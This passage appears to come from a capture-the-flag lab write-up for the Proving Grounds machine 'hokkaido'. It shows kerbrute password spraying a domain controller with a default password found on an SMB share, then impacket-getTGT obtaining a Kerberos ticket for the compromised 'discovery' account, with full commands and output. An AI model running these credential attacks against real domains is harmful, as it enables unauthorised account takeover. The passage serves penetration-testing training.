Password Spraying Attack
A default password has been uncovered from one of the shares in the target SMB server; Start123!
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ kerbrute passwordspray --dc dc.hokkaido-aerospace.com -d HOKKAIDO-AEROSPACE.COM ./users.txt 'Start123!'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 04/25/25 - Ronnie Flathers @ropnop
2025/04/25 15:36:33 > Using KDC(s):
2025/04/25 15:36:33 > dc.hokkaido-aerospace.com:88
2025/04/25 15:36:33 > [+] VALID LOGIN: discovery@HOKKAIDO-AEROSPACE.COM:Start123!
2025/04/25 15:36:33 > Done! Tested 33 logins (1 successes) in 0.327 secondsConducting a password spraying attack with the uncovered password; Start123!
It belongs to the discovery account
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/discovery@dc.hokkaido-aerospace.com -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: Start123!
[*] Saving ticket in discovery@dc.hokkaido-aerospace.com.ccacheValidated
TGT generated for the discovery account